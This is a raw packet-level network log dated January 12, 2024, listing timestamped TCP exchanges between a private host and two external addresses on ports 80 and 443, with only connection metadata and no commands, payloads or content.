                                                          Jan 12, 2024 23:12:29.022025108 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:29.156421900 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.156461954 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.241259098 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.241400003 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:29.244844913 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.461810112 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.462001085 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:29.462412119 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.691052914 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.691092014 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.691168070 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.691169977 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:29.911880970 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.911966085 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:29.912031889 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:29.913960934 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:30.133349895 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.133390903 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.133579016 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:30.135250092 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.354316950 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.354532003 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:30.355030060 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.355108023 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.576852083 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.577137947 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:30.798779964 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.798820019 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:30.799066067 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.019673109 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.019711018 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.019848108 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.019921064 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.021981001 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.252928972 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.252965927 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.253035069 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.253053904 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.253153086 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.254439116 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.254659891 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.473712921 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.473812103 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.473839045 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.473848104 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.473870039 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.473916054 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.473959923 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.021614075 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.021671057 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.022041082 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.022108078 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.022260904 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.022334099 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.022783995 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.022847891 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023119926 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023186922 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023411036 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023442030 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023467064 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023474932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023497105 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023507118 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023561001 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.080730915 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.080849886 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.146034956 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.146123886 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.192830086 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.192938089 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.241749048 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.241785049 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.241863012 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.241918087 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242383957 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242469072 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242635012 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242698908 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242707968 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242765903 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242861986 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242919922 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243093014 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243158102 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243280888 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243345022 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243392944 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243474007 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243655920 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243720055 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244041920 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.244103909 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244570017 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.244626999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244659901 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.244725943 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244996071 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.245054007 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.245062113 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.245121002 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.245376110 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.245435953 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.245537043 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.245596886 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.245801926 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.245860100 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.246395111 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.246469975 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.246506929 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.246565104 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.303639889 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.303755999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.344841003 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.344929934 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.368407011 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.368442059 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.368516922 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.368563890 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.414282084 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.414515018 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.462671041 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.462886095 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.462896109 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.462987900 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.463592052 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.463661909 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.463995934 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.464054108 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.464068890 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.464071989 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.464107037 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.464135885 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.464160919 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.464214087 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.464221001 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.464278936 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.464628935 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.464690924 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.465174913 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.465240955 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.465251923 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.465291977 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.465313911 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.465379000 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.465548992 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.465615034 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.465997934 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.466059923 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.466243029 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.466314077 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.466372967 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.466430902 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.466443062 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.466502905 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.466677904 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.466741085 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.466849089 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.466909885 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.467056990 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.467117071 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.467502117 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.467570066 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.507639885 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.507736921 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.524295092 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.524517059 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.566040993 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.566122055 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.591099977 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.591379881 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.591758013 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.591886044 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.635778904 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.635930061 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.683619022 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.683675051 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.683742046 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.683742046 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.683891058 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.684134960 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.684211016 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.684268951 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.684333086 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.684675932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.684747934 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.684767008 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.684833050 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.684839964 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.684916973 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.684919119 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.684983969 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.685188055 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.685252905 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.685322046 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.685389996 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.685517073 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.685580969 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.685748100 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.685816050 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.685966969 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.686033964 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.686609030 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.686640978 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.686676979 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.686712980 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.686726093 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.686799049 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.686841965 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.686904907 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.686958075 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.687027931 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.687231064 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.687295914 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.687381983 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.687443018 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.687921047 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.687958002 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.687997103 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.688055038 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.688263893 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.688322067 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.688460112 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.688517094 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.732306957 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.732384920 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.744934082 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.745009899 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.787492037 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.787579060 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.814013958 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.814096928 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.814239025 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.814297915 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.858226061 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.858355999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.904722929 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.904851913 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.905263901 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.905308962 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.905340910 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.905375957 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.905416012 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.905508041 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.905571938 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.905706882 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.905781984 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.906321049 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.906382084 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.906397104 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.906436920 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.906449080 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.906522036 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.906538963 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.906584024 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.906877041 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.906909943 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.906944990 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.906975031 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.907712936 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.907744884 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.907799006 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.907850981 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.907919884 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.907952070 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.907994032 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.908035994 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.908262014 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.908339024 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.908646107 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.908703089 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.908705950 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:38.703049898 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.703114033 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.703142881 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.703212976 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.783981085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.784081936 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.785134077 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.785206079 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.785281897 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.785360098 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.785379887 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.785449028 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.788743973 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.788907051 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.788963079 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789047956 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789072990 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.789088011 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789093971 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.789143085 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.789151907 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.789194107 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.797194004 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.797277927 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.797919035 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.797996044 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798017025 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798075914 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798697948 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798784971 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798808098 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798865080 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.798909903 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.798979044 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.799447060 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.799520016 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.799534082 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.799593925 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.882538080 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.882622004 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.882658005 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.882724047 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.884639978 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.884713888 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.884980917 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885049105 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.885272026 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885332108 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.885448933 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885510921 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.885859013 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.885926962 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.888264894 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.888334036 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.888564110 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.888617992 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.888727903 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.888809919 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.889343977 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.889404058 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.889532089 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.889592886 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.889837027 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.889916897 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.890172958 CET44349739162.159.130.233192.168.2.4
                                                          Jan 12, 2024 23:12:38.890233040 CET49739443192.168.2.4162.159.130.233
                                                          Jan 12, 2024 23:12:38.890878916 CET44349739162.159.130.233192.168.2.4
